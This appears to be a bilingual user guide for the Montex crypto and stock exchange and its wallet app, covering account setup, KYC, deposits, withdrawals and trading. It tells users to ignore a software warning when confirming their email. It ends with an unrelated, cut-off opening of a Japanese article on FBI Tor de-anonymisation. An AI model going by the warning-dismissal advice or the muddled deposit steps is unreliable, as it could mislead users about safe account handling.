Other functions of Montex Exchange

INDEX


Reviewing the history of Crypto currency/stock exchange

To review the history of crypto currency and stock exchange, select “crypto currency” or “stock” from top menu bar. Then the drop-down shows “buy” and “sell”, so you choose the one which you would like to review. The transaction history of your selection is displayed.
You can choose ‘limit order’ or ‘market order’ on the drop-down menu located on the upper left side of the screen.
When you use drop-down menu on the upper right side of the screen, you can choose the type of stock and crypto currency.  

Reviewing the history of depositing/withdrawing

To review the history of depositing/withdrawing from the wallet, select the ‘history of deposit’ or ‘history of withdrawal’ from “history of depositing/withdrawing” on top menu bar. Regarding the history of the insurance, we will explain later. Since you can choose the type of money/crypto currency, select whichever you would like to review. Then selected history of the depositing/withdrawing is displayed.

About Insurance

Here, we explain how to enroll insurance and/or to view the currently enrolled insurance. First to enroll insurance to your crypto currency, you have to go to the screen for “crypto currency”. Then from “market” on the left side of screen, choose the crypto currency you would like to have insured. Then information of the target crypto currency will appear on the screen. Please click the Green button.
You can enroll the insurance for your target crypto currency by 1MON as one unit.
The crypto currency you insured will not be used for the transaction. Please note that if you don’t have crypto currency valued as 1 ETH in your balance, you are not eligible to enroll insurance.
You can verify the amount you insured and the payment MONs by choosing the “history of deposit/withdrawal” on top menu bar followed by history of the insurance.
There is an upper limit to the number of units in the insurance, and there are those displayed as “MAX” on the screen.
This is shared by all users. In other words, it means “the insurance you are currently applying / the total number of insurance applied by all users / maximum insurance value”. If the custom token you were insured has broken down, the amount you’ve been insured will return as ETH. Returning ETH will fluctuate from time to time depending on the market value of ETH and the number of applications.

About the introduction video

For a start-up company, we offer an introduction video which is constructed with the site visits and interview of CEOs of the companies by Montex. This video is for investors to make better decisions on their investment. To view this video, choose “stocks” from top menu bar then choose “the detail of the target company” that appears on the upper side of the screen. 

Changing the picture on your profile

To change the picture on your profile, which appears during chat and upper side of the screen, click your name on the top menu bar then click “profile”. Hereafter, we call this screen as “profile screen”
On the upper left side of profile screen, click “upload” to upload your new picture.
The maximum size of the picture is 1MB and it accept JPG, JPEG and PNG format.
When you complete uploading picture, click “apply”. Your picture on the profile is updated.

Changing password

To change the password for log in, go to profile screen. On the upper right side of the screen, you can find a tile to change the password. Type in the current password and new password, then type the new password again for confirmation. Click “apply”. Your new password has been set to use.

Changing 2-step authentication method

For the security purpose, we do not recommend that you leave the authentication disabled. To disable or change the 2-steps authentication, go to profile screen. On the center of screen, you can find a tile for setting 2-step authentication. If you would like to change to a new method from the current one, first disable the current method, then select the new authentication method.

Updating personal information

To update personal information, go to profile screen. On the lower left side of the screen, you can find a tile for setting personal information. You can also set the name to use on chat here. If you have not set it yet, it displayed as “User”.
Once you type in all the information, click “update”. Your personal information is updated.

Updating bank information

To update your bank information, go to profile screen. On the lower right side of the screen, you can find a tile for setting your bank information.
Once you type in all the information, click “update”. Your bank information is updated.

Verifying your KYC

To verify your ID which you had already registered, click your name from the top menu bar, then click “update KYC”. On this screen, you can verify and update your ID. The update of your ID is not available until your current ID is expired.
On this screen, you can verify and update your ID. The update of your ID is not available until your current ID is expired.

Support chat

サポートチャットの方法について説明します。 To receive a support service via chat, click your name from top menu bar then click “support”.
Then click the “create a new inquiry” and type in the subject and message.
When you finish typing all the information, click “send”.
On the previous screen, you can exchange the message with customer support via chat.

How to buy and sell cryptocurrency on Montex Exchange

CONTENTS

  • Limit Order Purchases
  • Limit Order Sales
  • Price order Purchases
  • Price Order Sales

How to place a limit order purchase

On the lower middle section of the cryptocurrency page, there is a form like the one on the screenshot. Here, users can perform transactions. The value listed next to the green “Buy BTC” is the available amount of ETH and the value next to the red “Sell BTC” is the available amount of BTC.
For example, if you wanted to buy 1BTC with 30ETH, you fill in the form like so.
After inputting your desired price and quantity, the total amount and fees will be calculated automatically. While fees are automatically calculated at your behest, it is still recommended to use MON for a better deal. The % below the quantity space is used when buying cryptocurrency with your available amount of N%.
Click here for the price and the maximum value of buyable quantities will be listed.
After pressing the “Buy” button, a dialogue box like the one pictured below will appear. Press “Yes” to show your order.
The order you have just placed will be shown on the “Purchases” section, (pictured on the left) and the “Transaction History” section (pictured on the right).
Unconfirmed purchases will be listed on the “Open” subsection, and confirmed purchases will be listed on the “Close” subsection. If you wish to withdraw from a transaction, simply press “Cancel Trade” on the “Open” subsection. You will be asked to press a button on the dialogue box to cancel your purchases.

How to place a limit order sale

he process of placing a limit order sale is nearly identical to placing a limit order purchase. To place a limit order sale, fill in the form on the lower right side of the page.
As similar to placing a limit order purchase, the price and quantity will be calculated automatically. After confirming a transaction, you can check your sell orders on the left side of the page, and order history on the right side of the page.
To cancel or withdraw from a transaction, check the limit order purchase page.

How to place a price order purchase

Other than not having to input the price, the processes of placing an order is identical to placing a limit order sale. Firstly, go to the price order form. The page is under the “Price Order” subsection, located on the lower right portion of the form.
After clicking, you will be directed to the price order form. It is a very simple process due to the lack of inputting various values.
You cannot input prices. Simply input the amount of BTC you are willing to purchase, and choose whether to pay fees in MON or ETH.
Check the dialogue box, press “Yes” and your transaction will be complete. After completion, your order will not be listed under the “Open” subsection nor will it be eligible for cancellation.

How to place a price order sale

Once again, the processes of placing a price order sale is nearly identical to placing a price order purchase.
Choose the type of quantities and fees, and you will be prompted with a dialogue box. Confirm by pressing “Yes”, and you will be able to sell the appropriate cryptocurrency.

How to trade stocks on the Montex Exchange

CONTENTS

  • Limit Order BUY
  • Limit Order SELL
  • Market Order BUY
  • Market Order SELL

How to place a limit order buy

On the lower middle section of the stock trade page, there is a form similar to the one pictured on the screenshot. The values underneath the  “Buy” subtitle is the available amount of ETH and MON. Underneath the “Sell” subtitle are the quantities of stocks you currently own.
For example, if you wish to purchase 10 stocks using ETH in limit orders, you fill in the form as follows (Fees are paid by MON). Choose the type of currency you wish to transact, and after inputting the quantity of stocks you wish to buy, the total and fees will be automatically calculated. We recommend to use MON for a better deal when paying fees. The % underneath the quantity section is used when buying stocks with your available amount of N%.

For example, if 50% is charged when you have 1000 ETH, the total payment amount will be calculated as 500 ETH. Furthermore, if you wish to buy stocks shown seen on the “Buy Order” column, please do the following.
Click here for the price and the maximum value of buyable quantities will be listed. A confirmation dialogue box will appear after clicking the button, Press Yes to see your order.
The order you have just placed is seen on the “Open” subsection, placed in the “Buy Order” and “Transaction History” (pictured on the left and right of the screen, respectively). Unconfirmed purchases will be listed on the “Open” subsection, and confirmed purchases will be listed on the “Close” subsection. If you wish to withdraw from a transaction, simply press “Cancel Trade” on the “Open” subsection. You will be asked to press a button on the dialogue box to cancel your purchases.
[Ex] Sell Trade History
[Ex] Cancel Sell Trade

How to place a limit order sale

The process of placing a limit order sale is nearly identical to placing a limit order purchase. To place a limit order sale, fill in the form on the lower right side of the page.
As similar to placing a limit order purchase, the price and quantity will be calculated automatically. After confirming a transaction, you can check your sell orders on the left side of the page, and order history on the right side of the page.
To cancel or withdraw from a trade, check the limit order purchase page as it is identical.

How to place a price order purchase

Other than not having to input the price, the processes of placing an order is identical to placing a limit order sale. Firstly, go to the price order form. The page is under the “Price Order” subsection, located on the lower right side of the form.
After clicking, you will be directed to the price order form. It is a very simple process due to the lack of inputting various values.
You cannot input prices. Simply input the amount of stocks you wish to purchase, and choose whether to pay fees in MON or ETH.
Check the dialogue box, press “Yes” and your trade will be complete. After completion, your order will not be listed under the “Open” subsection nor will it be eligible for cancellation.

How to place a price order sale

Once again, the process is identical to placing a price order purchase.
Choose the type of quantity and fee, and you will be prompted with a dialogue box. After confirmation, you can sell your stocks. Realistically, you can obtain MON only by this method.

Montex Exchange- How to open an account and how to deposit or withdraw

THE MOST SAFE AND SECURE

STOCK AND
CRYPTO CURRENCY
EXCHANGE

Montex Market

This is an explanation of how to open and close an account in.

You can buy and sell from March 16, 2019 AM 11:00.
Until then, only account registration (account opening) and deposit and withdrawal functions can be performed.


Opening an account

CONTENTS

  1. Accessing Montex market
  2. Registering as a member
  3. Performing e-mail authentication
  4. Performing 2-factor authentication

First, go to and access Montex Market.
Please click here
Please click the “Sign Up”.
You should have a screen similar to the one displayed below, with “Create an Account” shown above.
I will now explain each item that need to be inputted.
  • First name—————————- Please input your first name
  • Last name—————————- Please input your surname
  • e-mail———————- Please input your mail address
  • Password—————- Please input your password
    • A-Z, a-z
    • 0-9 *required
    • Special Symbol *required
    • 8~16 characters
  • Password verification———- Please input the same password as above
When you have finished inputting the necessary information, please press the “SIGN UP” button at the bottom of the screen.
If the following screen is displayed, please check if there has been an e-mail sent to the e-mail address you entered. If you do not receive one after a while, please also check the contents of the spam mail folder.
Once you confirm the receipt of the email. Please click on the button 「CONFIRM EMAIL ADDRESS」.
Depending on the software, a warning may be displayed, Please just go straight to “Montex.market”. If the following screen is displayed, your membership registration is complete.
At this point your account has been created.
Let’s try logging in once here. Enter the email address and password you entered earlier. Then click on the login button.
When you log in for the first time, you will be sent to the following page.
These items are necessary for withdrawal and will be explained in detail later. At this point opening your account is complete. Thank you very much.

Deposits and withdrawals

CONTENTS

  • Setting of 2-factor authentication
  • Registration of id card
  • How to deposit
  • How to withdraw

We will now explain the method of deposit and withdrawal. Please start already logged in to your account.
For details on how to log in, please refer to “How to open an account”. The following screen is displayed at the time you login.
It is necessary to finish the following in order to withdraw money. So let’s finish them now. First is the two-step certification. Please click on the “2-step certification” button in the middle.

You should see a screen like the one below. This time I will explain how to authenticate by email.
After a while, you will see the screen below. At the same time, I think that email will be sent, So please enter the 6-digit number in the email.
If the value you entered is correct, you will see that the 2-step certification field turns green.
Then, an ID authentication will be carried out. Please click the rightmost ID certification.
Here you register your ID card. When transmission is completed, the screen returns to the screen shown below, however the status changes while waiting for authentication.
You will need to register your identification card, such as passport, when trading stocks and virtual currencies. Also, it takes several days to confirm your identification. Now we will explain the method of payment. Please click the part that says “wallet” at the top of the screen. Here you will find information on the virtual currencies, currencies and stocks that you can currently use.
Let’s deposit into ETH. Click on the deposit button next to ETH and you will see something like this:
Select Withdraw in the Montex Wallet and select the Ethereum token. Please scan the QR code displayed on the screen with your mobile device and enter the withdrawal address. Then, enter the amount you wish to withdraw.
When the withdrawal button is pressed, a confirmation screen and a passphrase input screen are displayed. Enter the passphrase.
Agree to the terms and conditions, press the “withdraw” button, and wait for a while to complete the payment to the Montex market.
In the wallet, you can confirm that the balance has increased and payment has been made.
Next, I will explain the procedure for withdrawal. From the wallet, click on the “withdrawal” button.
On the page that is displayed, enter the payee’s address, the amount to withdraw, and press the submit button.
Withdrawal may take 2-3 business days. When withdrawal is completed, you will be notified by email That is a description of how to withdraw.

Montex Exchange(Montex取引所)のその他の機能

もくじ


仮想通貨/株式取引履歴の閲覧

仮想通貨および株式の取引履歴を照会します。 上部メニューの取引履歴から、仮想通貨あるいは株式を選択してください。 買いか売りが表示されるので、閲覧したい方を選択してください。 これまでの取引履歴が表示されます。
画面左上のプルダウンメニューで指値か成行を、
画面右上のプルダウンメニューで株式や仮想通貨の種類を選択できます。

入出金履歴の閲覧

ウォレットへの入出金履歴を照会します。 上部メニューの入出金履歴から、入金履歴、出金履歴を選択してください。
保険履歴については後述します。 貨幣/仮想通貨の種類を選択できるので、閲覧したいものを選択してください。 選択した入出金履歴が表示されます。

保険について

保険のかけ方および現在かけている保険の閲覧方法について説明します。 仮想通貨に保険をかけるには、対象の仮想通貨の画面に移動します。
仮想通貨の画面左の市場から、保険をかけたい仮想通貨を選択してください。 画面上部に対象仮想通貨の情報が表示されます。 緑色のボタンをクリックしてください。
1MONを1口として、対象の仮想通貨に保険を掛けることができます。
トークンが破綻した際、申し込み口数に応じてETHとして返ってきます。
保険をかけた分の仮想通貨は、今後取引に使用できなくなります。 また、残高に 1 ETH 相当の保険対象となる仮想通貨がないと、保険をかけることはできません。
保険をかけた量と支払ったMONは、画面上部のメニューにある入出金履歴から、保険履歴を選択することで確認することができます。
保険の口数には上限があり、画面上に「MAX」と表示されるものがそれにあたります。これは全ユーザで共有されるものです。「Your:あなたが現在かけている保険 /Total: 全ユーザがかけている保険の総数 / Max保険の申し込み口数上限」という意味になります。
もし保険をかけていたカスタムトークンが破綻した場合、保険をかけていた分は ETH として返ってきます。返ってくる ETH は、ETH の相場や申込数に応じて随時変動いたします。

紹介動画について

スタートアップ企業には、Montex が現地訪問・代表者面談を行い作成した企業紹介動画をお届けします。 これは、投資家の方々によりわかりやすく投資判断を行っていただくためのものです。 この動画は上部メニューの株式から、画面上部に表示される対象企業の詳細部より閲覧することができます。

プロフィール写真の変え方

チャット使用時や画面上部に表示されるプロフィール画像の変更方法について説明します。 画面上部メニュー部分の、ご自身の名前のあたりをクリックし、プロフィールをクリックします。以降、この画面をプロフィール画面と呼称します。
画面左上のプロフィール画像からアップロードボタンをクリックし、新しい画像をアップロードします。
サイズは1MBを上限とし、JPG, JPEG, PNG形式に対応しております。
アップロードし終えましたら、適用ボタンをクリックして変更完了です。

パスワード変更方法

ログイン時のパスワードを変更する方法について説明します。 プロフィール画面の右上にパスワードを変更できるフォームがあります。 現在使用しているパスワード、新しく設定するパスワード、確認として再度新しく設定するパスワードを入力した後、適用ボタンをクリックするとパスワードの変更は完了です。

2段階認証方法変更

2段階認証の解除および変更方法について説明します。 セキュリティ保護のため、解除したままにしておくことはお勧めしておりません。 プロフィール画面の中央部に2段階認証の設定箇所があります。 現在使用している方法から別の方法に切り替えたい場合、
現在使用している認証方式を一度解除してから、
新しい認証方式を選択してください。

個人情報更新

個人情報の更新方法について説明します。 プロフィール画面の下部左側に、個人情報の設定箇所があります。 チャットで使用する名前もここで設定します。未設定の場合は「User」と表記されます。
入力が完了したら、更新ボタンで更新完了です。

銀行情報更新

銀行情報の更新方法について説明します。 プロフィール画面の下部右側に、銀行情報の設定箇所があります。
入力が完了したら、更新ボタンで更新完了です。

身分証明書の確認

現在提出済みの身分証明書情報の確認方法について説明します。 画面上部メニュー部分の、ご自身の名前のあたりをクリックし、KYC更新をクリックします。
この画面で身分証明書の確認と更新ができます。 更新は登録されている身分証明書の有効期限が切れなければ行うことができません。

サポートチャット

サポートチャットの方法について説明します。 画面上部メニュー部分の、ご自身の名前のあたりをクリックし、サポートをクリックします。
新しいチケットの発行ボタンを押し、件名とメッセージを入力します。
入力が終わりましたら、送信をクリックしてください。
前の画面にてチャット形式でサポートとメッセージのやりとりが可能です。

Montex Exchange(Montex取引所)の株式売買の仕方

もくじ

  • 指値買い注文
  • 指値売り注文
  • 成行買い注文
  • 成行売り注文

指値買い注文の方法について

株式売買のページの中央下部に、画像のようなフォームがあります。 買いの下に表示されているのが、現在使用できるETHとMONです。 売りの下に表示されているのが、現在所持している株数です。
例えば、指値で「ETHを使って5株」買いたい…とすると、以下のように入力します。(手数料はMONで支払います) 使用する通貨の種類を選び、買いたい株の数量を入力すると、合計と手数料が自動計算されます。 手数料はMONを使用したほうがよりお得に取引できるため、是非ご利用ください。 数量の下部にある「%」は、所持額のN%で株を購入するときに使用します。
例えば、1000 ETH 持っているときに 50 % とすると、合計支払額が 500 ETH になるように入力されます。 また、買い注文の欄にある価格で株を買いたい場合は以下のようにします。 今回の例では売り注文から株を買います。
クリックすると、クリックした価格とその金額で購入できる最大値が入力されます。 ボタンを押すと、以下のような確認ダイアログが表示されます。 買う株の量、現在の残高、ETHかMONどちらで購入するかの選択肢が表示されます。 「確認画面へ」を押すと、確認画面へ移行します。
こちらが確認画面です。
売り注文から直接購入したので、無事 5 株買うことができました。



指値売り注文の方法について

記入場所や表示箇所が異なるだけで、基本的には買い注文と同じです。 売り注文の場合は画面下部の注文フォームの右側をご使用ください。
買い注文の時と同じように、通貨の種類と売る株の数量を入力すると、合計額が計算されます。 例では買い注文から数値を入力します。
3 株だけ売りたい場合、数量を 3 に変更します。
「売り」ボタンを押すと、注文概要と支払い方法が聞かれます。
ETHかMONで株を売ることができます。
注文内容を確認したら、「注文する」ボタンを押してください。
5 株所持していたので、無事 3 株売ることができたことが確認できます。

成行買い注文の方法について

価格を記入する必要がない、ということを除けば、ほぼ指値注文と同じ手順で注文することができます。 まずは成り行き注文のフォームに移行します。 先程と同じ、画面下部の注文フォームの右側に、「成行」と書いてありますので、そちらをクリックしてください。
クリックすると、成り行き注文フォームに移行します。 指値より入力するものが少ない分、とてもシンプルです。 価格の入力はできませんので、どれくらいの株を買うかを入力し、手数料を MON か ETH のどちらで払うかを選択するだけです。
注文内容と残高を確認し、支払方法を選択して「確認画面へ」を押してください
「注文する」を押したときの価格で購入するため、具体的な支払額は表示されません

成行売り注文の方法について

こちらも成行買い注文と手順はほとんど同じです。
数量と手数料の種類を選択し、ボタンを押すと受取方法を選択するダイアログが表示されます。 選択後ボタンを押すと、最終確認ダイアログが表示されます。 「注文する」を押すと、注文が確定します。

Montex Exchange(Montex取引所)の仮想通貨の売買の仕方

もくじ

  • 指値買い注文
  • 指値売り注文
  • 成行買い注文
  • 成行売り注文

指値買い注文の方法について

仮想通貨のページの中央下部に、画像のようなフォームがあります。
ここで売買処理を行うことができます。 買いBTCの横に表示されているのが、現在使用できるETH 売りBTCの横に表示されているのが、現在使用できるBTC
例えば、指値で 「30ETH で 1 BTC」買いたい…とすると、以下のように入力します。
価格と数量を入力すると、合計と手数料が自動計算されます。 手数料も自動計算されますが、MONを使用したほうがよりお得に取引できますので、是非ご活用ください。 数量の下部にある「%」は、所持額のN%で仮想通貨を購入するときに使用します。
例えば、1000 ETH 持っているときに50%とすると、合計が 500 ETH になるように注文を出します。 また、買い注文の欄にある価格で買いたい場合は以下のようにします。
クリックすると、クリックした価格とその金額で購入できる最大値が入力されます。
買うボタンを押すと、以下のような確認ダイアログが表示されます。 Yesを押すと、入力した注文を出します。
たった今行った注文が、画面左の「買い注文」と画面右の「取引履歴」に表示されているのを確認できます。
注文が未確定の場合は Open に、注文が確定したら Close に表示されます。 注文を取り下げたい場合は Open の Cancel Trade を押します。 確認ダイアログが表示され、ボタンを押すと注文がキャンセルされます。

指値売り注文の方法について

記入場所や表示箇所が異なるだけで、基本的には買い注文と同じです。 売り注文の場合は画面下部の注文フォームの右側をご使用ください。
買い注文のときと同じように、価格と数量を入力すると合計が計算されます。 注文を送信すると、画面左側の売り注文と画面右側の取引履歴で確認できます。
注文のキャンセルの方法につきましては、買い注文のときと全く同じとなります。

成行買い注文の方法について

価格を記入する必要がない、ということを除けば、ほぼ指値注文と同じ手順で注文することができます。 まずは成行注文のフォームに移行します。 先程と同じ、画面下部の注文フォームの右側に、「成行」と書いてありますので、そちらをクリックしてください。
クリックすると、成行注文フォームに移行します。
指値より入力するものが少ない分、とてもシンプルです。
価格の入力はできませんので、どれくらいの BTC を買うかを入力し、手数料を MON か ETH のどちらで払うかを選択するだけです。
ダイアログを確認し、Yes を押せば注文確定となります。 即決するため、Open には行かず、キャンセルもできません。

成行売り注文の方法について

こちらも成行買い注文と手順はほとんど同じです。
数量と手数料の種類を選択し、ボタンを押すと確認ダイアログが表示されます。 確認後 Yes を押すと、対象の仮想通貨を売ることができます。

Montex Exchange(Montex取引所)の口座開設の仕方及び入出金方法

投資家保護を考えた
世界初 仮想通貨取引所
Montex market

Montex market [http://montex.market/] における
口座開設入出金の方法について解説していきます。

2019年3月16日 PM5:00(日本時間)から売買取引をすることができます。
それまでは、アカウント登録しか行えません。


口座開設

もくじ

  1. Montex marketにアクセスする
  2. 日本語化する
  3. 会員登録を行う
  4. メール認証を行う
  5. 2段階認証を行う

まず、Montex marketにアクセスします。
こちらをクリックしてください。
上の画像のような英語のページが開かれましたでしょうか。
いきなり英語で戸惑われたかと思います。
次はこのページを日本語で表示しましょう。

今開いているページの上部にある、国旗のマークを押下してみてください。
日本の国旗が表示されたでしょうか。
表示されたら、それを押下してみましょう。
いかがでしょう、日本語の表示になりましたでしょうか。
次はいよいよ口座の開設をしましょう。 ではまず、右上の「会員登録」ボタンを押下してください。
上にアカウント作成と書かれた、以下の画像のような画面になりましたでしょうか。
それではそれぞれの入力項目などについて、説明していきます。
  • —————————- 名前を入力してください
  • —————————- 苗字を入力してください
  • メール———————- メールアドレスを入力してください
  • パスワード—————- パスワードを入力してください
    • 英字
    • 数字 * 必須
    • 特殊記号 * 必須
    • 8文字以上、16文字以内
  • パスワード確認———- パスワードと同じものを入力してください
入力が終わりましたら、画面下部の「会員登録」ボタンを押下してください。
以下のような画面が表示されましたら、入力したメールアドレスにメールが来ていないか、確認してください。しばらく経っても来ない場合は、迷惑メールフォルダの中身もご確認ください。
メールの受信が確認できましたら、
「CONFIRM EMAIL ADDRESS」と書かれているボタンをクリックしてください。
ソフトによっては警告が表示されるかもしれませんが、
そのまま「montex.market」にアクセスしてください。 以下のような画面が表示されれば、会員登録完了です。
この時点であなたの口座は開設されました。
ここで一度ログインしてみましょう。
先程入力した、メールアドレスとパスワードを入力してください。
その後、ログインボタンをクリックしてください。
初めてのログインの時は、以下のようなページに移動します。
これらの項目は出金時に必要ですので、後で詳しく説明していきます。
この時点で口座開設は完了となります。
お疲れさまでした。

入出金

もくじ

  • 2段階認証の設定
  • 身分証明書の登録
  • 入金の仕方
  • 出金の仕方

入出金のやり方について説明します。
すでにログインしている状態から始めます。
ログインの方法については、口座開設の仕方をご覧ください。 さて、ログイン時に以下のような画面が表示されたと思います。
出金するためにはこれらを済ませておく必要がありますので、
先に済ませておきましょう。 まずは2段階認証からです。
右の2段階認証をクリックしてください。
以下のような画面が表示されたと思います。
今回はメールで認証する方法を説明します。
しばらくすると、以下のような画面になると思います。
それと同時に、メールが送られてきていると思いますので、
そのメールに書かれている6桁の数字を入力しましょう。
入力した値が正しいと、2段階認証の欄が緑色になったのを確認できると思います。
では次に、KYC認証を行います。プロフィールから本人確認をクリックしてください。
ここでは、あなたの身分証明書を登録します。 株の取引きおよび仮想通貨の出金時には、パスポートなどの身分証明書の登録が必要です。また、確認までに数日を要します。 それではいよいよ入金の方法について説明いたします。 画面上部、「ウォレット」と書かれている部分をクリックしてください。
ここに、現在あなたが使用できる仮想通貨・通貨・株の情報が表示されます。
それではETHを入金してみましょう。
ETHの横にある入金ボタンをクリックすると、以下のような画面になります。
Montex WalletでWithdrawを選択し、Ethereumトークンを選択。
画面に映っているQRコードをお手持ちの携帯端末でスキャンし、出金先アドレスを入力してください。
その後、任意の出金額を入力してください。
出金ボタンを押すと、確認画面とパスフレーズ入力画面が表示されますので、パスフレーズを入力してください。
利用規約に同意し、「出金する」ボタンを押し、しばらく待つとMontex marketへの入金が完了いたします。
ウォレットにて、残高が増え入金できたことが確認できると思います。
※入金がブロックチェーン上で確認されると一旦「保留中」になります。その後「利用可能残高」として表示されます。その間数時間かかる場合があります。
※入金反映(確認)まで数時間かかる場合があります。ブロックチェーンの混雑状況により異なります。しばらく経ってから確認してください。
次に出金の手順を説明いたします。 ウォレットから、「出金」ボタンをクリックしてください。
表示されたページで、出金先のアドレスと、出金する額を入力し、送信ボタンを押してください。
出金は2~3営業日かかる場合があります。
出金が完了すると、メールで通知されます。 一日に出金できる仮想通貨は、総額で2BTC相当となります。 以上で出金の説明を終わります。

Montex Walletの使い方

Montex Walletを利用して、ETH, ERC20, ERC223, ERC721トークンの管理及び入出金できます。

高度なセキュリティを搭載した次世代の無料ウォレットアプリです。

特徴
生体認証を使い、ETH、ERC20、ERC223、ERC721のカスタムトークンとしては業界初のマルチシグネチャテクノロジーにより認証方式で高度なセキュリティを搭載した次世代の専用ウォレットです。

・生体認証
仮にユーザ名・パスワードの漏洩、端末の紛失など不測の事態が起きてもアカウントにログインできるのは本人だけです。
※Androidの場合指紋認証、iOSの場合指紋認証もしくはFaci IDを利用します。

・サーバーがハッキング被害にあった場合
ハッキングにより仮にサーバの中にあるアカウント情報が漏洩しても復元不可能です。 アカウント情報は高度なレベル(※1)で暗号化されており、その暗号は最初に登録した端末だけが復元する事ができます。
また各アカウントの鍵はサーバ側ではなく端末に保存しマルチシグネチャの仕組みを取り入れています。サーバが仮にハッキング被害にあった場合でもあなたの資産は安全です。
※1)2048 bit RSA暗号

・携帯を紛失した場合
専用の管理画面からデバイスを無効化しロック(ログイン不可)する事ができます。

・メール情報が漏洩した場合
アプリにログイン中であればいつでもメールアドレスを変更できます。
アプリにログインできない場合は専用の管理画面からメールアドレスの変更が行えます。

推奨バージョン
Android 4.x以上
iOS 11以上
※生体認証(FaceID or 指紋認証)付きの端末を推奨
iOSの場合はApp Store、Androidの場合はPlay Storeからダウンロードします。

機能一覧
・ETH、ERC20、ERC223、ERC721を外部のETHアドレスに送金する事ができます。
・外部からETH、ERC20、ERC223、ERC721を預入する事ができます。
・ETH、ERC20、ERC223、ERC721の送金履歴表示を表示し、トランザクションなど詳細を確認できます。
・ETH、ERC20、ERC223、ERC721の預入履歴表示を表示し、トランザクションなど詳細を確認できます。
・ERC20、ERC223、ERC721のカスタムトークンを追加できます。

ダウンロード及びインストール方法
下記各種マーケットからダウンロードしてください。

アカウント登録方法

①アプリを起動したら、SignUpをタップします。


②メールアドレス、UserNameは英数字の3文字以上、電話番号は頭の0を省略して入力します。電話番号が仮に090-1234-5678の場合9012345678となります。
パスワードは、英数字8文字以上で数字を1文字以上、かつ記号(!@$#%)を最低一文字入力しします。
※パスワードは忘れないようにしてください。

確認用でパスワードをもう一度入力して、Continueをタップします。
入力したメールアドレス宛にコードが送られてきます。

③メールを確認して、6桁の数字を入力します。
利用規約にチェックして、SignUpをタップします。

【重要】パスフレーズが表示されますので、かならず、紙に書くなどして、書き留めて安全な場所に保管しておいてください。このパスフレーズをなくすとアカウントの引継ぎ、出金など重要な操作ができなくなります。このパスフレーズは弊社側でも復元、再発行が行えませんので大切に保管してください。
※パスフレーズはこの画面でしか表示されず、以降どこにも表示されません。紛失及びコピーし忘れた場合は違うメールアドレスを使って再度アカウント作成する必要があります。

⑤生体認証(指紋認証もしくはFaceID)を登録するか聞いてきますので、YESをタップして登録を行ってください。使用する生体認証の種類は端末によって異なります。また生体認証に対応していない端末の場合はこの画面は表示されません。セキュリティ強化の為に生体認証に対応した端末でご利用ください。

日本語への切り替え方法

右下の「Setting」をタップします。



言語を選択する事で切り替えする事が可能です。

ETH入金の方法

⑥DepositをタップしてQRコードを送金元から読み込むかアドレスをコピーして、送金元のアドレスに設定します。MyEtherWalletから送金する場合の例です。MyEtherWalletにログインして、送出先アドレスにコピーしたアドレスを張り付けして送金します。

履歴の確認

Dashboardに戻り、ETHEREUMをタップします。

Depositを選択して、該当する箇所をタップするとトランザクションハッシュが確認できます。

出金の方法

「Withdraw」をタップします。
SelcetTokenで送金したいトークンを選択してください。
To Addressには送金先のアドレスを、Amountには送りたい量を入力し、「Withdraw」ボタンをタップします。
※ScanをタップするとQRコードを読み取りのカメラが起動します。送金先にQRコードがある場合そこからアドレスを読み取ることが可能です。

送金の確認

内容を確認して、アカウント作成時に保存しておいたパスフレーズを入力します。
この場合9番目の「fickle」を入力します。
利用規約に同意するにチェックを行い、Withdraw Nowボタンをタップします。

送金完了まで待ちます。この処理は時間がかかる場合があります。ブロックチェーンの混雑状況によります。

カスタムトークンの追加方法

1.検索による追加方法

ダッシュボードの右上にある虫メガネアイコンをタップします。

追加したいトークンを検索します。たとえば、BinanceCoin(BNB)を追加したい場合、Bとだけ入力するとBがあるカスタムトークンのリストが表示されます。トークン追加をタップして追加します。

※略称やシンボルではなく正式なトークン名で検索する必要があります。1文字からでも検索可能です。また検索してもリストにない場合3文字(大文字小文字は関係ない)程度入力して検索を行ってください。

2.手動によるトークン追加方法
検索で追加したいトークンがない場合、手動で登録する事ができます。

まず、Etherscanにアクセスして追加したいトークンの情報を検索します。

たとえば、BinanceCoin(BNB)を他のウオレットにもっており、そのBNBを追加したい場合の説明します。
(※BNBはすでにMontexWalletでは登録されていますので実際はこの手順ではなく検索から登録追加をおこないます。)

まず、EthersanにアクセスしてBNBで検索します。Contractという箇所、この場合


0xB8c77482e45F1F44dE1745F52C74426C631bDD52

これがトークンアドレスですので、そのアドレスをコピーします。
MontexWalletにもどり、+ボタンをタップします。

TokenAddressの箇所に張り付けしてキーボードの送信をおします。
、Addをタップします。

正しく読み取りが行えた場合、シンボルと桁数が表示されます。
Addボタンをタップして登録します。
※セキュリティ上の観点からVerify And Publishされたカスタムトークンのみ追加可能となります。
Verify And Publishされたトークンは、Etherscanのサイトで、Codeにチェックマークがついています。これはコードが公開され承認されている事を意味しています。Codeにチェックが入っていないトークンはソース公開、検証されていないトークンとなりMontexWalletでは基本的に追加できません。


※すでに登録がある場合はこの方法では登録できません。虫メガネアイコンの検索から登録を行ってください。

追加したトークンの削除

ダッシュボードで、削除したいトークンを左にスワイプすると削除ボタンが表示されます。タップする事で削除できます。
※残高のあるトークンは削除できません。
※また運営側が固定で配置しているトークン(ETH、NOAH、MONなど)は削除できません。

レート変更

Settingsから、ダッシュボードで表示しているレートの変更が行えます。

インストール時はUSDで設定されています。、SettingsからCurrencyをJPYに変えると右図のように日本円レート(JPY)で表示されます。
※レート取得できるトークンのみとなります。

端末を紛失した場合
MontexWalletのHPにアクセスして、端末からのログインをブロックする事が可能です。

https://montex-wallet.com
にアクセスし、右上の「ログインする」をクリックします。

登録しているメールアドレスとパスワードを入力して、ログインを行います。

メールを確認して、コードを入力します。

ログインをブロックしたい端末の「状態」をクリックします。

アカウント作成時に保存しておいたパスフレーズを入力します。この場合4番目の単語を入力します。


パスフレースがあっているとロックがかかり、アプリからログインできなくなります。
紛失した場合上記作業を行ってロックする事ができます。

重要:パスフレーズはアカウント作成時1回だけ表示されます。パスフレーズをなくすと資産の出金、端末の入れ替え、ログインのロックなど重要な操作ができなくなります。パスフレーズは弊社サーバー内でも保存していませんので復旧する事ができません。取り扱いには十分注意してください。

FBIがTorを破ったネットワーク捜査手法について

tor
FBIは過去にTorを利用して児童ポルノサイトにアクセスするユーザを1000人以上摘発したことが知られています。
その手法はMetasploit FrameworkのDecloaking Engineを利用したものだと言われています。
今回はDecloaking Engineとはなんなのかを調査してみたいと思います。

Decloaking Engineの概要

